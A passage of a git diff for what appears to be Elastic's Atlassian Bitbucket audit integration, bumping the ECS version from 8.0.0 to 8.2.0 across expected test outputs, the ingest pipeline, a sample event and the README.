"version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6552,7 +6552,7 @@ { "@timestamp": "2021-11-27T17:29:18.849Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6606,7 +6606,7 @@ { "@timestamp": "2021-11-27T17:29:18.770Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6660,7 +6660,7 @@ { "@timestamp": "2021-11-27T17:29:18.764Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6714,7 +6714,7 @@ { "@timestamp": "2021-11-27T17:29:18.134Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6768,7 +6768,7 @@ { "@timestamp": "2021-11-27T17:29:17.595Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6822,7 +6822,7 @@ { "@timestamp": "2021-11-27T17:29:17.589Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6876,7 +6876,7 @@ { "@timestamp": "2021-11-27T17:29:12.439Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6930,7 +6930,7 @@ { "@timestamp": "2021-11-27T17:29:12.421Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6984,7 +6984,7 @@ { "@timestamp": "2021-11-27T17:29:12.393Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7038,7 +7038,7 @@ { "@timestamp": "2021-11-27T17:29:12.364Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7092,7 +7092,7 @@ { "@timestamp": "2021-11-27T17:29:12.363Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7146,7 +7146,7 @@ { "@timestamp": "2021-11-27T17:29:11.242Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7200,7 +7200,7 @@ { "@timestamp": "2021-11-27T17:29:11.102Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7254,7 +7254,7 @@ { "@timestamp": "2021-11-27T17:29:11.019Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7308,7 +7308,7 @@ { "@timestamp": "2021-11-27T17:29:10.955Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7362,7 +7362,7 @@ { "@timestamp": "2021-11-27T17:29:10.661Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7416,7 +7416,7 @@ { "@timestamp": "2021-11-27T17:29:10.658Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7470,7 +7470,7 @@ { "@timestamp": "2021-11-27T17:29:10.656Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7524,7 +7524,7 @@ { "@timestamp": "2021-11-27T17:29:10.644Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7578,7 +7578,7 @@ { "@timestamp": "2021-11-27T17:29:10.643Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7632,7 +7632,7 @@ { "@timestamp": "2021-11-27T17:29:10.560Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7686,7 +7686,7 @@ { "@timestamp": "2021-11-27T17:29:09.996Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7740,7 +7740,7 @@ { "@timestamp": "2021-11-27T17:29:09.992Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7794,7 +7794,7 @@ { "@timestamp": "2021-11-27T17:29:09.967Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7848,7 +7848,7 @@ { "@timestamp": "2021-11-27T17:29:09.825Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7902,7 +7902,7 @@ { "@timestamp": "2021-11-27T17:29:09.800Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7956,7 +7956,7 @@ { "@timestamp": "2021-11-27T17:29:09.796Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8010,7 +8010,7 @@ { "@timestamp": "2021-11-27T17:29:09.732Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8064,7 +8064,7 @@ { "@timestamp": "2021-11-27T17:29:09.340Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8118,7 +8118,7 @@ { "@timestamp": "2021-11-27T17:29:09.068Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8172,7 +8172,7 @@ { "@timestamp": "2021-11-27T17:29:09.008Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8226,7 +8226,7 @@ { "@timestamp": "2021-11-27T17:29:08.877Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8280,7 +8280,7 @@ { "@timestamp": "2021-11-27T17:29:08.836Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8334,7 +8334,7 @@ { "@timestamp": "2021-11-27T17:29:08.642Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8388,7 +8388,7 @@ { "@timestamp": "2021-11-27T17:29:08.597Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8442,7 +8442,7 @@ { "@timestamp": "2021-11-27T17:29:07.438Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8496,7 +8496,7 @@ { "@timestamp": "2021-11-27T17:29:07.326Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8550,7 +8550,7 @@ { "@timestamp": "2021-11-27T17:29:07.312Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8604,7 +8604,7 @@ { "@timestamp": "2021-11-27T17:29:07.281Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8658,7 +8658,7 @@ { "@timestamp": "2021-11-27T17:29:05.974Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8712,7 +8712,7 @@ { "@timestamp": "2021-11-27T17:29:05.973Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8766,7 +8766,7 @@ { "@timestamp": "2021-11-27T17:29:05.941Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8820,7 +8820,7 @@ { "@timestamp": "2021-11-27T17:29:05.922Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8874,7 +8874,7 @@ { "@timestamp": "2021-11-27T17:29:05.893Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8928,7 +8928,7 @@ { "@timestamp": "2021-11-27T17:29:05.892Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -8982,7 +8982,7 @@ { "@timestamp": "2021-11-27T17:29:03.203Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9036,7 +9036,7 @@ { "@timestamp": "2021-11-27T17:29:02.812Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9090,7 +9090,7 @@ { "@timestamp": "2021-11-27T17:29:02.809Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9144,7 +9144,7 @@ { "@timestamp": "2021-11-27T17:29:02.796Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9198,7 +9198,7 @@ { "@timestamp": "2021-11-27T17:29:02.529Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9252,7 +9252,7 @@ { "@timestamp": "2021-11-27T17:29:02.528Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9306,7 +9306,7 @@ { "@timestamp": "2021-11-27T17:29:02.521Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9360,7 +9360,7 @@ { "@timestamp": "2021-11-27T17:29:02.387Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9414,7 +9414,7 @@ { "@timestamp": "2021-11-27T17:29:02.050Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9468,7 +9468,7 @@ { "@timestamp": "2021-11-27T17:29:02.049Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9522,7 +9522,7 @@ { "@timestamp": "2021-11-27T17:29:02.047Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9576,7 +9576,7 @@ { "@timestamp": "2021-11-27T17:29:02.047Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9630,7 +9630,7 @@ { "@timestamp": "2021-11-27T17:29:02.046Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9684,7 +9684,7 @@ { "@timestamp": "2021-11-27T17:29:02.043Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9738,7 +9738,7 @@ { "@timestamp": "2021-11-27T17:29:00.763Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9792,7 +9792,7 @@ { "@timestamp": "2021-11-27T17:29:00.746Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9846,7 +9846,7 @@ { "@timestamp": "2021-11-27T17:29:00.736Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9900,7 +9900,7 @@ { "@timestamp": "2021-11-27T17:29:00.687Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -9954,7 +9954,7 @@ { "@timestamp": "2021-11-27T17:26:26.205Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10009,7 +10009,7 @@ { "@timestamp": "2021-11-27T17:26:25.141Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -10070,7 +10070,7 @@ { "@timestamp": "2021-11-27T17:26:25.045Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json index 3b9ecd09808..d2bc3605491 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json +++ b/packages/atlassian_bitbucket/data_stream/audit/_dev/test/pipeline/test-audit-files.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-11-27T17:34:25.313Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -98,7 +98,7 @@ { "@timestamp": "2021-11-27T17:34:26.190Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -173,7 +173,7 @@ { "@timestamp": "2021-11-27T17:34:26.108Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -248,7 +248,7 @@ { "@timestamp": "2021-11-27T17:34:26.112Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -311,7 +311,7 @@ { "@timestamp": "2021-11-27T17:35:11.898Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -374,7 +374,7 @@ { "@timestamp": "2021-11-27T17:35:31.362Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -446,7 +446,7 @@ { "@timestamp": "2021-11-27T17:35:33.930Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -518,7 +518,7 @@ { "@timestamp": "2021-11-27T17:35:45.810Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -590,7 +590,7 @@ { "@timestamp": "2021-11-27T17:35:46.331Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -662,7 +662,7 @@ { "@timestamp": "2021-11-27T17:36:17.991Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -727,7 +727,7 @@ { "@timestamp": "2021-11-27T17:36:17.993Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -792,7 +792,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -857,7 +857,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -922,7 +922,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -987,7 +987,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1052,7 +1052,7 @@ { "@timestamp": "2021-11-27T17:36:17.994Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1117,7 +1117,7 @@ { "@timestamp": "2021-11-27T17:36:18.370Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1181,7 +1181,7 @@ { "@timestamp": "2021-11-27T17:36:18.873Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1253,7 +1253,7 @@ { "@timestamp": "2021-11-27T17:36:19.269Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1325,7 +1325,7 @@ { "@timestamp": "2021-11-27T17:36:40.674Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1401,7 +1401,7 @@ { "@timestamp": "2021-11-27T17:36:40.692Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1496,7 +1496,7 @@ { "@timestamp": "2021-11-27T17:38:04.808Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1571,7 +1571,7 @@ { "@timestamp": "2021-11-27T17:38:16.687Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1666,7 +1666,7 @@ { "@timestamp": "2021-11-27T17:38:23.209Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1761,7 +1761,7 @@ { "@timestamp": "2021-11-27T17:38:29.423Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1836,7 +1836,7 @@ { "@timestamp": "2021-11-27T17:38:42.151Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -1913,7 +1913,7 @@ { "@timestamp": "2021-11-27T17:38:53.360Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2006,7 +2006,7 @@ { "@timestamp": "2021-11-27T17:38:58.870Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2080,7 +2080,7 @@ { "@timestamp": "2021-11-27T17:39:16.414Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2149,7 +2149,7 @@ { "@timestamp": "2021-11-27T17:39:16.499Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2221,7 +2221,7 @@ { "@timestamp": "2021-11-27T17:52:48.728Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2308,7 +2308,7 @@ { "@timestamp": "2021-11-27T17:52:48.751Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2378,7 +2378,7 @@ { "@timestamp": "2021-11-27T17:53:38.996Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2469,7 +2469,7 @@ { "@timestamp": "2021-11-27T17:53:46.125Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2558,7 +2558,7 @@ { "@timestamp": "2021-11-27T17:53:52.180Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2647,7 +2647,7 @@ { "@timestamp": "2021-11-27T17:53:56.893Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2738,7 +2738,7 @@ { "@timestamp": "2021-11-27T17:54:02.547Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2807,7 +2807,7 @@ { "@timestamp": "2021-11-27T17:54:02.652Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2879,7 +2879,7 @@ { "@timestamp": "2021-11-27T17:54:33.144Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -2935,7 +2935,7 @@ { "@timestamp": "2021-11-27T17:54:38.580Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3009,7 +3009,7 @@ { "@timestamp": "2021-11-27T17:54:43.620Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3078,7 +3078,7 @@ { "@timestamp": "2021-11-27T17:54:51.210Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3147,7 +3147,7 @@ { "@timestamp": "2021-11-27T17:54:51.275Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3219,7 +3219,7 @@ { "@timestamp": "2021-11-27T17:57:37.606Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3295,7 +3295,7 @@ { "@timestamp": "2021-11-27T17:58:11.800Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3386,7 +3386,7 @@ { "@timestamp": "2021-11-27T17:59:08.272Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3487,7 +3487,7 @@ { "@timestamp": "2021-11-27T17:59:15.721Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3588,7 +3588,7 @@ { "@timestamp": "2021-11-27T17:59:19.377Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3679,7 +3679,7 @@ { "@timestamp": "2021-11-27T17:59:26.116Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3753,7 +3753,7 @@ { "@timestamp": "2021-11-27T17:59:30.135Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3822,7 +3822,7 @@ { "@timestamp": "2021-11-27T17:59:30.204Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3894,7 +3894,7 @@ { "@timestamp": "2021-11-27T18:00:37.416Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -3945,7 +3945,7 @@ { "@timestamp": "2021-11-27T18:01:17.660Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4010,7 +4010,7 @@ { "@timestamp": "2021-11-27T18:01:17.828Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4097,7 +4097,7 @@ { "@timestamp": "2021-11-27T18:01:17.832Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4167,7 +4167,7 @@ { "@timestamp": "2021-11-27T18:01:18.549Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4257,7 +4257,7 @@ { "@timestamp": "2021-11-27T18:01:35.988Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4327,7 +4327,7 @@ { "@timestamp": "2021-11-27T18:01:41.630Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4402,7 +4402,7 @@ { "@timestamp": "2021-11-27T18:01:41.495Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4477,7 +4477,7 @@ { "@timestamp": "2021-11-27T18:03:20.954Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4552,7 +4552,7 @@ { "@timestamp": "2021-11-27T18:03:41.114Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4627,7 +4627,7 @@ { "@timestamp": "2021-11-27T18:03:41.684Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4707,7 +4707,7 @@ { "@timestamp": "2021-11-27T18:03:41.710Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4787,7 +4787,7 @@ { "@timestamp": "2021-11-27T18:03:42.444Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4862,7 +4862,7 @@ { "@timestamp": "2021-11-27T18:04:07.861Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -4954,7 +4954,7 @@ { "@timestamp": "2021-11-27T18:04:08.132Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5046,7 +5046,7 @@ { "@timestamp": "2021-11-27T18:04:08.133Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5137,7 +5137,7 @@ { "@timestamp": "2021-11-27T18:04:08.141Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5243,7 +5243,7 @@ { "@timestamp": "2021-11-27T18:04:23.970Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5335,7 +5335,7 @@ { "@timestamp": "2021-11-27T18:04:23.975Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5427,7 +5427,7 @@ { "@timestamp": "2021-11-27T18:04:24.600Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5518,7 +5518,7 @@ { "@timestamp": "2021-11-27T18:04:32.296Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5609,7 +5609,7 @@ { "@timestamp": "2021-11-27T18:04:35.945Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5700,7 +5700,7 @@ { "@timestamp": "2021-11-27T18:04:47.255Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5792,7 +5792,7 @@ { "@timestamp": "2021-11-27T18:04:47.288Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5884,7 +5884,7 @@ { "@timestamp": "2021-11-27T18:04:47.298Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -5975,7 +5975,7 @@ { "@timestamp": "2021-11-27T18:04:47.298Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6081,7 +6081,7 @@ { "@timestamp": "2021-11-27T18:04:55.112Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6156,7 +6156,7 @@ { "@timestamp": "2021-11-27T18:05:10.261Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6225,7 +6225,7 @@ { "@timestamp": "2021-11-27T18:05:10.321Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6297,7 +6297,7 @@ { "@timestamp": "2021-11-27T18:10:57.308Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6362,7 +6362,7 @@ { "@timestamp": "2021-11-27T18:10:57.315Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6449,7 +6449,7 @@ { "@timestamp": "2021-11-27T18:10:57.316Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6519,7 +6519,7 @@ { "@timestamp": "2021-11-27T18:10:57.333Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6609,7 +6609,7 @@ { "@timestamp": "2021-11-27T18:11:04.913Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6684,7 +6684,7 @@ { "@timestamp": "2021-11-27T18:11:09.514Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6772,7 +6772,7 @@ { "@timestamp": "2021-11-27T18:11:09.527Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6860,7 +6860,7 @@ { "@timestamp": "2021-11-27T18:11:09.632Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -6935,7 +6935,7 @@ { "@timestamp": "2021-11-27T18:11:17.550Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7004,7 +7004,7 @@ { "@timestamp": "2021-11-27T18:11:17.629Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7076,7 +7076,7 @@ { "@timestamp": "2021-11-27T18:12:40.133Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7146,7 +7146,7 @@ { "@timestamp": "2021-11-27T18:12:40.466Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7226,7 +7226,7 @@ { "@timestamp": "2021-11-27T18:12:44.207Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7295,7 +7295,7 @@ { "@timestamp": "2021-11-27T18:12:44.262Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7367,7 +7367,7 @@ { "@timestamp": "2021-11-27T18:13:19.888Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7437,7 +7437,7 @@ { "@timestamp": "2021-11-27T18:13:19.960Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7507,7 +7507,7 @@ { "@timestamp": "2021-11-27T18:13:24.368Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7576,7 +7576,7 @@ { "@timestamp": "2021-11-27T18:13:24.428Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7648,7 +7648,7 @@ { "@timestamp": "2021-11-27T18:14:14.900Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7718,7 +7718,7 @@ { "@timestamp": "2021-11-27T18:14:14.978Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7806,7 +7806,7 @@ { "@timestamp": "2021-11-27T18:14:18.395Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ @@ -7875,7 +7875,7 @@ { "@timestamp": "2021-11-27T18:14:18.451Z", "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "related": { "user": [ diff --git a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 4ffb59e12b1..336372f262b 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -6,7 +6,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - rename: field: message target_field: event.original diff --git a/packages/atlassian_bitbucket/data_stream/audit/sample_event.json b/packages/atlassian_bitbucket/data_stream/audit/sample_event.json index d9d20a7e98e..e8163536d90 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/sample_event.json +++ b/packages/atlassian_bitbucket/data_stream/audit/sample_event.json @@ -38,7 +38,7 @@ "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/atlassian_bitbucket/docs/README.md b/packages/atlassian_bitbucket/docs/README.md index 1a82efa02af..c682485ec02 100644 --- a/packages/atlassian_bitbucket/docs/README.md +++ b/packages/atlassian_bitbucket/docs/README.md @@ -138,7 +138,7 @@ An example event for `audit` looks as following: "type": "logs" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "82d0dfd8-3946-4ac0-a092-a9146a71e3f7", diff --git a/packages/atlassian_bitbucket/manifest.yml b/packages/atlassian_bitbucket/manifest.yml index 82132d43795..eb1f972a1d9 100644 